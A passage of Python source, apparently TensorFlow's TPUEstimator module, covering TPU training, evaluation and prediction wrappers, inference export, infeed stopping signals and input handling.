export_outputs_list)
export_outputs = estimator_spec.export_outputs
new_export_outputs = collections.OrderedDict(
(k, _clone_export_output_with_tensors(export_outputs[k], v))
for k, v in six.iteritems(new_export_outputs_dict))
# Reconstruct `predictions` with updated tensors.
new_predictions = nest.pack_sequence_as(predictions_dict, predictions_list)
if (len(new_predictions) == 1 and
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR in new_predictions):
new_predictions = new_predictions[_KEY_WHEN_PREDICTIONS_IS_A_TENSOR]
return estimator_spec._replace(
export_outputs=new_export_outputs, predictions=new_predictions)
def _build_computation_for_inference(self, features, labels, mode, config):
capture = _CapturedObject()
def computation():
"""Computation to be passed to `TPUPartitionedCall()`."""
tpu_computation, tpu_capture = self._build_tpu_computation_for_inference(
features, labels, mode, config)
if self._experimental_export_device_assignment:
# Export the device assignment as part of the model. This is useful for
# model parallel use cases where the model relies on the mapping between
# logical and physical devices.
with self._ctx.with_mode(mode) as ctx:
device_assignment = ctx.device_assignment
else:
device_assignment = None
if self._experimental_export_device_assignment:
tensors_on_cpu = tpu.rewrite_for_inference(
tpu_computation, device_assignment=device_assignment)
else:
tensors_on_cpu = tpu.rewrite(
tpu_computation, device_assignment=device_assignment)
tpu.prune_unconnected_ops_from_xla(ops.get_default_graph())
(estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict) = (
tpu_capture.get())
predictions_list = tensors_on_cpu[:len(predictions_dict)]
export_outputs_tpu_on_cpu_list = tensors_on_cpu[len(predictions_dict):]
# Reconstruct tensors used in export_outputs, with TPU tensors replaced
# with their CPU counterpart returned from `rewrite_for_inference()`.
# `function.Defun()` does not like `None`s in return values, so we leave
# `None`s out but record their positions for later reconstruction.
export_outputs_list_without_none = []
none_indices = []
for i, t in enumerate(export_outputs_list):
if t is None:
none_indices.append(i)
else:
export_outputs_list_without_none.append(
export_outputs_tpu_on_cpu_list.pop(0))
capture.capture((estimator_spec, export_outputs_dict, predictions_dict,
none_indices))
return predictions_list + export_outputs_list_without_none
return computation, capture
def _build_tpu_computation_for_inference(self, features, labels, mode,
config):
capture = _CapturedObject()
def computation():
"""Compute tpu tensors used in export_outputs.
Passed to rewrite_for_inference so that model_fn will be called under
the rewriting contexts. Only tpu tensors are returned, but export_outputs
and scaffold are captured.
Returns:
A list of Tensors used in export_outputs and not marked for
outside_compilation.
"""
# We should only call model fn once and it should be inside `computation`
# so that building the graph will happen under `rewrite_for_inference`.
estimator_spec = super(TPUEstimator, self)._call_model_fn(
features, labels, mode, config)
# We pick the TPU tensors out from `export_output` and later return them
# from `computation` for rewriting.
export_outputs_dict = collections.OrderedDict(
(k, _export_output_to_tensors(v))
for k, v in six.iteritems(estimator_spec.export_outputs))
export_outputs_list = nest.flatten(export_outputs_dict)
export_outputs_tpu_list = [
t for t in export_outputs_list if t is not None
]
if isinstance(estimator_spec.predictions, dict):
predictions_dict = collections.OrderedDict(
(k, v) for k, v in six.iteritems(estimator_spec.predictions))
else:
predictions_dict = {
_KEY_WHEN_PREDICTIONS_IS_A_TENSOR: estimator_spec.predictions
}
predictions_list = nest.flatten(predictions_dict)
# We cannot return everything we want through the return values, so
# capture the rest here for later use.
capture.capture((estimator_spec, export_outputs_dict, export_outputs_list,
predictions_dict))
return predictions_list + export_outputs_tpu_list
return computation, capture
def _create_global_step(self, graph):
"""Creates a global step suitable for TPUs.
Args:
graph: The graph in which to create the global step.
Returns:
A global step `Tensor`.
Raises:
ValueError: if the global step tensor is already defined.
"""
return _create_global_step(graph)
def _convert_train_steps_to_hooks(self, steps, max_steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.TRAIN) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_train_steps_to_hooks(
steps, max_steps)
# On TPU.
if steps is None and max_steps is None:
raise ValueError(
'For TPU training, one of `steps` or `max_steps` must be set. '
'Cannot be both `None`.')
# Estimator.train has explicit positiveness check.
if steps is not None:
util_lib.check_positive_integer(steps, 'Train steps')
if max_steps is not None:
util_lib.check_positive_integer(max_steps, 'Train max_steps')
return [
_TPUStopAtStepHook(self._iterations_per_training_loop, steps, max_steps)
]
def _convert_eval_steps_to_hooks(self, steps):
with self._ctx.with_mode(model_fn_lib.ModeKeys.EVAL) as ctx:
if ctx.is_running_on_cpu():
return super(TPUEstimator, self)._convert_eval_steps_to_hooks(steps)
if steps is None:
raise ValueError('Evaluate `steps` must be set on TPU. Cannot be `None`.')
util_lib.check_positive_integer(steps, 'Eval steps')
return [
evaluation._StopAfterNEvalsHook( # pylint: disable=protected-access
num_evals=steps),
_SetEvalIterationsHook(steps)
]
def _call_input_fn(self, input_fn, mode):
"""Calls the input function.
Args:
input_fn: The input function.
mode: ModeKeys
Returns:
In TPU mode, returns an input_fn to be called later in model_fn.
Otherwise, calls the input_fn and returns either features or
(features, labels).
Raises:
ValueError: if input_fn takes invalid arguments or does not have `params`.
"""
input_fn_args = function_utils.fn_args(input_fn)
config = self.config # a deep copy.
kwargs = {}
if 'params' in input_fn_args:
kwargs['params'] = self.params # a deep copy.
else:
raise ValueError('input_fn ({}) does not include params argument, '
'required by TPUEstimator to pass batch size as '
'params["batch_size"]'.format(input_fn))
if 'config' in input_fn_args:
kwargs['config'] = config
if 'mode' in input_fn_args:
kwargs['mode'] = mode
# Records the fact input_fn has been invoked.
self._is_input_fn_invoked = True
with self._ctx.with_mode(mode) as ctx:
# Set the batch size in params first. This helps the user to have the same
# input_fn for use_tpu=True/False.
batch_size_for_input_fn = ctx.batch_size_for_input_fn
if batch_size_for_input_fn is not None:
_add_item_to_params(kwargs['params'], _BATCH_SIZE_KEY,
batch_size_for_input_fn)
# For export_savedmodel, input_fn is never passed to Estimator. So,
# `is_export_mode` must be False.
if ctx.is_running_on_cpu(is_export_mode=False):
with ops.device('/device:CPU:0'):
return input_fn(**kwargs)
# For TPU computation, input_fn should be invoked in a tf.while_loop for
# performance. While constructing the tf.while_loop, the structure of
# inputs returned by the `input_fn` needs to be recorded. The structure
# includes whether features or labels is dict or single Tensor, dict keys,
# tensor shapes, and dtypes. The recorded structure is used to create the
# infeed dequeue ops, which must be wrapped and passed as a Fn, called
# inside the TPU computation, as the TPU computation is wrapped inside a
# tf.while_loop also. So, we either pass input_fn to model_fn or pass
# dequeue_fn to model_fn. Here, `input_fn` is passed directly as
# `features` in `model_fn` signature.
def _input_fn(ctx):
_add_item_to_params(kwargs['params'], _CTX_KEY, ctx)
return input_fn(**kwargs)
return _input_fn
def _validate_features_in_predict_input(self, result):
"""Skip the validation.
For TPUEstimator, we do not need to check the result type. `_InputPipeline`
has a stronger check. The parent class's check generates a confusing warning
message.
Args:
result: `features` returned by input_fn.
"""
pass
def train(self,
input_fn,
hooks=None,
steps=None,
max_steps=None,
saving_listeners=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.TRAIN] = rendezvous
try:
return super(TPUEstimator, self).train(
input_fn=input_fn,
hooks=hooks,
steps=steps,
max_steps=max_steps,
saving_listeners=saving_listeners)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('training_loop', sys.exc_info())
finally:
rendezvous.record_done('training_loop')
rendezvous.raise_errors()
def evaluate(self,
input_fn,
steps=None,
hooks=None,
checkpoint_path=None,
name=None):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.EVAL] = rendezvous
try:
return super(TPUEstimator, self).evaluate(
input_fn,
steps=steps,
hooks=hooks,
checkpoint_path=checkpoint_path,
name=name)
except Exception: # pylint: disable=broad-except
rendezvous.record_error('evaluation_loop', sys.exc_info())
finally:
rendezvous.record_done('evaluation_loop')
rendezvous.raise_errors()
def predict(self,
input_fn,
predict_keys=None,
hooks=None,
checkpoint_path=None,
yield_single_examples=True):
rendezvous = error_handling.ErrorRendezvous(num_sources=3)
self._rendezvous[model_fn_lib.ModeKeys.PREDICT] = rendezvous
try:
for result in super(TPUEstimator, self).predict(
input_fn=input_fn,
predict_keys=predict_keys,
hooks=hooks,
checkpoint_path=checkpoint_path,
yield_single_examples=yield_single_examples):
yield result
except Exception: # pylint: disable=broad-except
rendezvous.record_error('prediction_loop', sys.exc_info())
finally:
rendezvous.record_done('prediction_loop')
rendezvous.raise_errors()
def _augment_model_fn(self, model_fn, batch_axis):
"""Returns a new model_fn, which wraps the TPU support."""
def _model_fn(features, labels, mode, config, params):
"""A Estimator `model_fn` for TPUEstimator."""
# `input_fn` is called in `train()`, `evaluate()`, and `predict()`,
# but not in `export_savedmodel()`.
if self._is_input_fn_invoked:
is_export_mode = False
else:
is_export_mode = True
# Clear the bit.
self._is_input_fn_invoked = None
if is_export_mode:
if mode == _REWRITE_FOR_INFERENCE_MODE:
_add_item_to_params(params, _USE_TPU_KEY, True)
mode = model_fn_lib.ModeKeys.PREDICT
else:
_add_item_to_params(params, _USE_TPU_KEY, False)
with self._ctx.with_mode(mode) as ctx:
model_fn_wrapper = _ModelFnWrapper(model_fn, config, params, ctx)
# examples_hook is added to training_hooks for both CPU and TPU
# execution.
if self._log_every_n_steps is not None:
examples_hook = ExamplesPerSecondHook(
ctx.global_batch_size,
# pylint:disable=g-long-ternary
output_dir=(self.model_dir
if not config or config.save_summary_steps
else None),
# pylint:enable=g-long-ternary
every_n_steps=self._log_every_n_steps)
if ctx.is_running_on_cpu(is_export_mode=is_export_mode):
logging.info('Running %s on CPU', mode)
estimator_spec = model_fn_wrapper.call_without_tpu(
features, labels, is_export_mode=is_export_mode)
if self._log_every_n_steps is not None:
estimator_spec = estimator_spec._replace(
training_hooks=estimator_spec.training_hooks + (examples_hook,))
return estimator_spec
assert labels is None, '`labels` passed to `model_fn` must be `None`.'
# TPUEstimator._call_input_fn passes `input_fn` as features to here.
assert callable(features), '`input_fn` is not callable.'
input_fn = features
tpu_init_ops = []
if ctx.embedding_config and mode == model_fn_lib.ModeKeys.TRAIN:
dummy_table_variables, dummy_table_variables_init = (
tpu_embedding_gradient.create_dummy_table_variables(
ctx.embedding_config.tpu_embedding))
ctx.embedding_config.dummy_table_variables = dummy_table_variables
tpu_init_ops.append(dummy_table_variables_init)
input_holders = _InputPipeline(input_fn, batch_axis, ctx)
enqueue_ops, dequeue_fn, input_hooks, run_infeed_loop_on_coordinator = (
input_holders.generate_infeed_enqueue_ops_and_dequeue_fn())
graph = ops.get_default_graph()
for enqueue_op in enqueue_ops:
if isinstance(enqueue_op, list):
graph.get_collection_ref(_TPU_ENQUEUE_OPS).extend(enqueue_op)
else:
graph.add_to_collection(_TPU_ENQUEUE_OPS, enqueue_op)
if mode == model_fn_lib.ModeKeys.TRAIN:
compile_op, loss, host_call, scaffold_fn, training_hooks = (
_train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
optimization_parameters = (
ctx.embedding_config.tpu_embedding.optimization_parameters)
embedding_variable_name_by_table, slot_variable_names_by_table = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict, optimization_parameters
)
)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table,
slot_variable_names_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after the variables for TPU embedding have
# been created on CPU, as the user might reinitialize them from a
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
host_ops = host_call.create_tpu_hostcall()
shutdown_hooks = []
shutdown_mode = os.environ.get('TF_TPU_GRACEFUL_SHUTDOWN_MODE',
'reset_computation')
if shutdown_mode:
if shutdown_mode == 'shutdown_worker':
finalizer_hooks = [
session_support.ShutdownLameWorkers(),
]
elif shutdown_mode == 'shutdown_all_workers':
finalizer_hooks = [
session_support.ShutdownAllWorkers(),
]
elif shutdown_mode == 'reset_computation':
finalizer_hooks = [
session_support.ResetComputation(),
]
elif not shutdown_mode:
finalizer_hooks = []
else:
raise ValueError(
'Unknown TF_TPU_GRACEFUL_SHUTDOWN_MODE "%s"' % shutdown_mode)
if finalizer_hooks:
shutdown_hooks.append(
session_support.GracefulShutdownHook(
checkpoint_prefix=self.model_dir + '/model.ckpt',
on_shutdown_hooks=finalizer_hooks))
with ops.control_dependencies([loss]):
global_step = array_ops.identity(training.get_global_step())
hooks = input_hooks + shutdown_hooks
hooks.extend([
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops),
InstallSignalHandlerHook()
])
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if self._log_every_n_steps is not None:
logging_hook_frequency = ( # Divide and round up
(self._log_every_n_steps +
self._config.tpu_config.iterations_per_loop - 1) //
self._config.tpu_config.iterations_per_loop)
hooks.append(
training.LoggingTensorHook({
'loss': array_ops.identity(loss),
'step': global_step,
},
every_n_iter=logging_hook_frequency))
examples_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
hooks.append(examples_hook)
if training_hooks:
hooks.extend(training_hooks)
chief_hooks = []
if (self._config.save_checkpoints_secs or
self._config.save_checkpoints_steps):
checkpoint_hook = training.CheckpointSaverHook(
self.model_dir,
save_secs=self._config.save_checkpoints_secs,
save_steps=self._config.save_checkpoints_steps,
scaffold=scaffold)
checkpoint_hook._set_steps_per_run( # pylint: disable=protected-access
self._config.tpu_config.iterations_per_loop)
chief_hooks.append(checkpoint_hook)
summary.scalar(model_fn_lib.LOSS_METRIC_KEY, loss)
with ops.control_dependencies([loss]):
update_ops = _sync_variables_ops(ctx)
if ctx.embedding_config:
update_ops.extend(embedding_variables_and_ops.retrieve_ops())
# Validate the TPU training graph to catch basic errors
_validate_tpu_training_graph()
train_op = control_flow_ops.group(*update_ops)
graph.add_to_collection(_TPU_TRAIN_OP, train_op)
return model_fn_lib.EstimatorSpec(
mode,
loss=loss,
training_chief_hooks=chief_hooks,
training_hooks=hooks,
train_op=train_op,
scaffold=scaffold)
if mode == model_fn_lib.ModeKeys.EVAL:
compile_op, total_loss, host_calls, scaffold_fn, eval_hooks = (
_eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn))
if ctx.embedding_config:
g = ops.get_default_graph()
table_to_config_dict = (
ctx.embedding_config.tpu_embedding.table_to_config_dict)
embedding_variable_name_by_table, _ = (
_tpu_estimator_embedding.get_full_variable_names(
g, table_to_config_dict)
)
embedding_variables_and_ops = (
ctx.embedding_config.tpu_embedding.create_variables_and_ops(
embedding_variable_name_by_table
))
tpu_init_ops.extend(embedding_variables_and_ops.load_ops())
# scaffold_fn must be called after the variables for TPU embedding have
# been created on CPU, as the user might reinitialize them from a
# checkpoint within scaffold_fn.
scaffold = _get_scaffold(scaffold_fn)
iterations_per_loop_var = _create_or_get_iterations_per_loop()
mean_loss = math_ops.div(
total_loss,
math_ops.cast(iterations_per_loop_var, dtype=total_loss.dtype))
with ops.control_dependencies([mean_loss]):
# After the TPU evaluation computation is done (the mean_loss tensor),
# read all variables back from the TPU and update the eval step
# counter properly.
internal_ops_to_run = _sync_variables_ops(ctx)
internal_ops_to_run.append(
_increase_eval_step_op(iterations_per_loop_var))
host_call_ret = host_calls.create_tpu_hostcall()
eval_metric_ops = {}
eval_update_ops = []
eval_metrics = host_call_ret.get('eval_metrics', {})
if eval_metrics:
# Creates a dummy metric update_op for all metrics. Estimator
# expects every metric in `eval_metric_ops` to have an update_op and
# calls them one by one. The real metric update_ops are invoked in a
# separate thread. So, here we give Estimator the dummy op for all
# metrics.
with ops.control_dependencies(internal_ops_to_run):
dummy_update_op = control_flow_ops.no_op()
for k, v in eval_metrics.items():
eval_metric_ops[k] = (v[0], dummy_update_op)
eval_update_ops.append(v[1])
else:
# If no eval metrics are passed, create an identity node for the
# loss and add `internal_ops_to_run` to its dependencies. So
# `internal_ops_to_run` can be executed.
with ops.control_dependencies(internal_ops_to_run):
mean_loss = array_ops.identity(mean_loss)
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
hooks = [
TPUInfeedOutfeedSessionHook(
ctx,
enqueue_ops,
eval_update_ops + host_ops,
tpu_compile_op=compile_op,
run_infeed_loop_on_coordinator=(
run_infeed_loop_on_coordinator),
rendezvous=self._rendezvous[mode],
master=self._config.evaluation_master,
session_config=self._session_config,
tpu_init_ops=tpu_init_ops)
] + input_hooks
if tpu_cluster_resolver.is_running_in_gce():
hooks.extend(
[preempted_hook.CloudTPUPreemptedHook(self._config.cluster)])
if eval_hooks:
hooks.extend(eval_hooks)
return model_fn_lib.EstimatorSpec(
mode,
loss=mean_loss,
evaluation_hooks=hooks,
eval_metric_ops=eval_metric_ops,
scaffold=scaffold)
# Predict
assert mode == model_fn_lib.ModeKeys.PREDICT
(compile_op, dummy_predict_op, host_calls,
scaffold_fn, prediction_hooks) = _predict_on_tpu_system(
ctx, model_fn_wrapper, dequeue_fn)
scaffold = _get_scaffold(scaffold_fn)
with ops.control_dependencies([dummy_predict_op]):
internal_ops_to_run = _sync_variables_ops(ctx)
with ops.control_dependencies(internal_ops_to_run):
dummy_predict_op = control_flow_ops.no_op()
# In train and evaluation, the main TPU program is passed to monitored
# training session to run. Infeed enqueue and outfeed dequeue are
# executed in side threads. This is not the configuration for
# prediction mode.
#
# For prediction, the Estimator executes the EstimatorSpec.predictions
# directly and yields the element (via a generator) to the call site. So, the
# outfeed based prediction must be passed to MonitoredSession directly.
# Other parts of the TPU execution are organized as follows.
#
# 1. All outfeed based Tensors must be grouped with predictions Tensors
# to form a single invocation. This avoids the issue where we might trigger
# multiple outfeeds incorrectly. To achieve this, `host_call` is
# placed in control_dependencies of `stopping_signals`, and
# `stopping_signals` is passed into _StoppingPredictHook, which sets
# the `stopping_signals` as SessionRunArgs. MonitoredSession merges
# all SessionRunArgs with the fetch in session.run together.
#
# 2. The TPU program (dummy_predict_op) and enqueue_ops (infeed Enqueue)
# are grouped together. They will be launched once and only once in
# side threads and they quit naturally according to the SAME stopping
# condition.
enqueue_ops.append(dummy_predict_op)
host_call_ret = host_calls.create_tpu_hostcall()
if 'host_call' not in host_call_ret:
host_ops = []
else:
host_ops = host_call_ret['host_call']
predictions = host_call_ret['predictions']
_verify_cross_hosts_transfer_size(
predictions,
message=(
'The estimated size for TPUEstimatorSpec.predictions is too '
'large.'))
signals = host_call_ret['signals']
with ops.control_dependencies(host_ops):
host_ops = []  # Empty; we do not need it anymore.
scalar_stopping_signal = _StopSignals.as_scalar_stopping_signal(
signals)
predictions = _PaddingSignals.slice_tensor_or_dict(
predictions, signals)
hooks = [
_StoppingPredictHook(scalar_stopping_signal),
TPUInfeedOutfeedSessionHookForPrediction(
ctx, enqueue_ops, host_ops, rendezvous=self._rendezvous[mode],
tpu_compile_op=compile_op,
master=self._config.master,
session_config=self._session_config),
] + input_hooks
if prediction_hooks:
hooks.extend(prediction_hooks)
return model_fn_lib.EstimatorSpec(
mode,
prediction_hooks=hooks,
predictions=predictions,
scaffold=scaffold)
return _model_fn
def _export_output_to_tensors(export_output):
"""Get a list of `Tensors` used in `export_output`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
Returns:
a list of tensors used in export_output.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
return [export_output.scores, export_output.classes]
elif isinstance(export_output, export_output_lib.RegressionOutput):
return [export_output.value]
elif isinstance(export_output, export_output_lib.PredictOutput):
return list(export_output.outputs.values())
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _clone_export_output_with_tensors(export_output, tensors):
"""Clones `export_output` but with new `tensors`.
Args:
export_output: an `ExportOutput` object such as `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
tensors: a list of `Tensors` used to construct a new `export_output`.
Returns:
A dict similar to `export_output` but with `tensors`.
Raises:
ValueError: if `export_output` is not one of `ClassificationOutput`,
`RegressionOutput`, or `PredictOutput`.
"""
if isinstance(export_output, export_output_lib.ClassificationOutput):
if len(tensors) != 2:
raise ValueError('tensors must be of length 2; '
'got {}.'.format(len(tensors)))
return export_output_lib.ClassificationOutput(*tensors)
elif isinstance(export_output, export_output_lib.RegressionOutput):
if len(tensors) != 1:
raise ValueError('tensors must be of length 1; '
'got {}'.format(len(tensors)))
return export_output_lib.RegressionOutput(*tensors)
elif isinstance(export_output, export_output_lib.PredictOutput):
return export_output_lib.PredictOutput(
dict(zip(export_output.outputs.keys(), tensors)))
else:
raise ValueError(
'`export_output` must have type `ClassificationOutput`, '
'`RegressionOutput`, or `PredictOutput`; got {}.'.format(export_output))
def _eval_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_eval_step, host_calls, captured_scaffold_fn, captured_eval_hooks
) = model_fn_wrapper.convert_to_single_tpu_eval_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_eval_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_eval_step,
[_ZERO_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_eval_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_calls, captured_scaffold_fn,
captured_eval_hooks.get())
def _train_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
iterations_per_loop_var = _create_or_get_iterations_per_loop()
(single_tpu_train_step, host_call, captured_scaffold_fn,
captured_training_hooks) = (
model_fn_wrapper.convert_to_single_tpu_train_step(dequeue_fn))
@tpu_function.on_device_training_loop
def multi_tpu_train_steps_on_single_shard():
return training_loop.repeat(iterations_per_loop_var, single_tpu_train_step,
[_INITIAL_LOSS])
(compile_op, loss,) = tpu.split_compile_and_shard(
multi_tpu_train_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
loss = loss[0]
return (compile_op, loss, host_call, captured_scaffold_fn,
captured_training_hooks.get())
def _predict_on_tpu_system(ctx, model_fn_wrapper, dequeue_fn):
"""Executes `model_fn_wrapper` multiple times on all TPU shards."""
(single_tpu_predict_step, host_calls, captured_scaffold_fn,
captured_predict_hooks
) = model_fn_wrapper.convert_to_single_tpu_predict_step(dequeue_fn)
@tpu_function.on_device_training_loop
def multi_tpu_predict_steps_on_single_shard():
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
inputs = [_StopSignals.NON_STOPPING_SIGNAL]
outputs = training_loop.while_loop(
cond, single_tpu_predict_step, inputs=inputs, name=b'loop')
return outputs
(compile_op, dummy_predict_op,) = tpu.split_compile_and_shard(
multi_tpu_predict_steps_on_single_shard,
inputs=[],
num_shards=ctx.num_replicas,
outputs_from_all_shards=False,
device_assignment=ctx.device_assignment)
dummy_predict_op = dummy_predict_op[0]
return (compile_op, dummy_predict_op, host_calls, captured_scaffold_fn,
captured_predict_hooks.get())
def _wrap_computation_in_while_loop(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def computation(i):
with ops.control_dependencies(op_fn()):
return i + 1
iterations_per_loop_var = _create_or_get_iterations_per_loop()
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
iterations = array_ops.identity(iterations_per_loop_var)
return control_flow_ops.while_loop(
lambda i: i < iterations,
computation, [constant_op.constant(0)],
parallel_iterations=1)
def _wrap_computation_in_while_loop_with_stopping_signals(device, op_fn):
"""Wraps the ops generated by `op_fn` in tf.while_loop."""
def cond(scalar_stopping_signal):
return math_ops.logical_not(
_StopSignals.should_stop(scalar_stopping_signal))
def computation(unused_scalar_stopping_signal):
return_value = op_fn()
execute_ops = return_value['ops']
signals = return_value['signals']
with ops.control_dependencies(execute_ops):
return _StopSignals.as_scalar_stopping_signal(signals)
# By setting parallel_iterations=1, the parallel execution in while_loop is
# basically turned off.
with ops.device(device):
return control_flow_ops.while_loop(
cond,
computation, [_StopSignals.NON_STOPPING_SIGNAL],
parallel_iterations=1)
def _validate_tpu_training_graph():
"""Validate graph before running distributed training.
Raises:
ValueError: If the graph seems invalid for running on device
"""
operations = ops.get_default_graph().get_operations()
# Check if there is at least one CrossReplicaSum operation in the graph
# This should be introduced by using the CrossShardOptimizer wrapper
cross_replica_sum_ops = [
o for o in operations if o.type == _CROSS_REPLICA_SUM_OP
]
if not cross_replica_sum_ops:
raise ValueError(
'CrossShardOptimizer must be used for model training on TPUs.')
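# For reference, the CrossReplicaSum check above passes when the model_fn wraps
# its optimizer with CrossShardOptimizer, e.g. (a hedged sketch; the learning
# rate value is illustrative):
#
#   optimizer = tf.contrib.tpu.CrossShardOptimizer(
#       tf.train.GradientDescentOptimizer(learning_rate=0.01))
#   train_op = optimizer.minimize(loss, global_step=tf.train.get_global_step())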
class _CapturedObject(object):
"""A placeholder to capture an object.
This is useful when we need to capture a Python object in the TensorFlow
control flow body function and use it outside the control flow.
"""
def __init__(self):
self._object = None
self._captured = False
def capture(self, o):
if self._captured:
raise RuntimeError(
'InternalError: Object can capture only once. Please file bug.')
self._captured = True
self._object = o
def get(self):
if not self._captured:
raise RuntimeError(
'InternalError: Object is not captured properly before `get`. '
'Please file bug.')
return self._object
def _get_scaffold(captured_scaffold_fn):
"""Retrieves the Scaffold from `captured_scaffold_fn`."""
with _CapturingContext(message='Inside scaffold_fn'):
scaffold_fn = captured_scaffold_fn.get()
if scaffold_fn:
scaffold = scaffold_fn()
if scaffold is None:
raise ValueError(
'TPUEstimatorSpec.scaffold_fn returns None, which is not allowed')
else:
scaffold = None
if scaffold:
wrapped_finalize = scaffold.finalize
def _finalize():
with _CapturingContext('Inside Scaffold.finalize'):
wrapped_finalize()
scaffold.finalize = _finalize
return scaffold
class _CapturingContext(control_flow_ops.ControlFlowContext):
"""Tracks references to Tensors defined in TPU replication."""
def __init__(self, message):
control_flow_ops.ControlFlowContext.__init__(self)
self._message = message
def to_control_flow_context_def(self, context_def, export_scope=None):
# pylint: disable=useless-super-delegation
# NOTE(slebedev): the method is required by `ControlFlowContext`.
super(_CapturingContext, self).to_control_flow_context_def(
context_def, export_scope)
def AddOp(self, op): # pylint: disable=invalid-name
for c in op.inputs:
if tpu._TPU_REPLICATE_ATTR in c.op.node_def.attr: # pylint: disable=protected-access
raise ValueError('{}: Op {} depends on TPU computation {}, '
'which is not allowed.'.format(self._message, op, c))
def __enter__(self):
# pylint: disable=protected-access
self._g = ops.get_default_graph()
self._old = self._g._get_control_flow_context()
self._g._set_control_flow_context(self)
# pylint: enable=protected-access
def __exit__(self, _, __, ___): # pylint: disable=invalid-name
self._g._set_control_flow_context(self._old) # pylint: disable=protected-access
class _Inputs(object):
"""A data structure representing the input_fn returned values.
This also supports the returned value from input_fn as `Dataset`.
"""
def __init__(self, features=None, labels=None, dataset=None, signals=None):
if dataset is not None and (features is not None or labels is not None or
signals is not None):
raise RuntimeError('Internal Error: Either (features and labels) or '
'dataset should be provided, not both. Please file '
'bug')
self._features = features
self._labels = labels
self._signals = signals
self._dataset = dataset
self._iterator = None
@staticmethod
def from_input_fn(return_values):
"""Returns an `_Inputs` instance according to `input_fn` return value."""
if isinstance(return_values, dataset_ops.DatasetV2):
dataset = return_values
return _Inputs(dataset=dataset)
features, labels = _Inputs._parse_inputs(return_values)
return _Inputs(features, labels)
@staticmethod
def _parse_inputs(return_values):
if isinstance(return_values, tuple):
features, labels = return_values
else:
features, labels = return_values, None
return features, labels
@property
def is_dataset(self):
"""Returns True if the return value from input_fn is Dataset."""
return self._dataset is not None
def dataset_initializer(self):
"""Returns the dataset's initializer.
The initializer must be run before calling `features_and_labels`.
"""
self._iterator = dataset_ops.make_initializable_iterator(self._dataset)
return self._iterator.initializer
def features_and_labels(self):
"""Gets `features` and `labels`."""
if self.is_dataset:
if self._iterator is None:
raise RuntimeError('Internal error: Must run dataset_initializer '
'before calling features_and_labels(). Please file '
'a bug!')
return _Inputs._parse_inputs(self._iterator.get_next())
return (self._features, self._labels)
def signals(self):
return self._signals
@property
def dataset(self):
return self._dataset
class _InputsWithStoppingSignals(_Inputs):
"""Inputs with `_StopSignals` inserted into the dataset."""
def __init__(self,
dataset,
batch_size,
add_padding=False,
num_invocations_per_step=1):
assert dataset is not None
user_provided_dataset = dataset.map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=False, batch_size=batch_size, add_padding=add_padding))
if num_invocations_per_step == 1:
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
else:
# We append (2 * num_invocations_per_step - 1) batches for exhausting the
# user_provided_dataset and stop properly.
# For example, if num_invocations_per_step is 2, we append 3 additional
# padding batches: b1, b2, b3.
# If user_provided_dataset contains two batches: a1, a2
# Step 1: [a1, a2]
# Step 2: [b1, b2] -> STOP
# If user_provided_dataset contains three batches: a1, a2, a3.
# The training loops:
# Step 1: [a1, a2]
# Step 2: [a3, b1]
# Step 3: [b2, b3] -> STOP.
final_batch_dataset = dataset.take(1).map(
_InputsWithStoppingSignals.insert_stopping_signal(
stop=True, batch_size=batch_size, add_padding=add_padding))
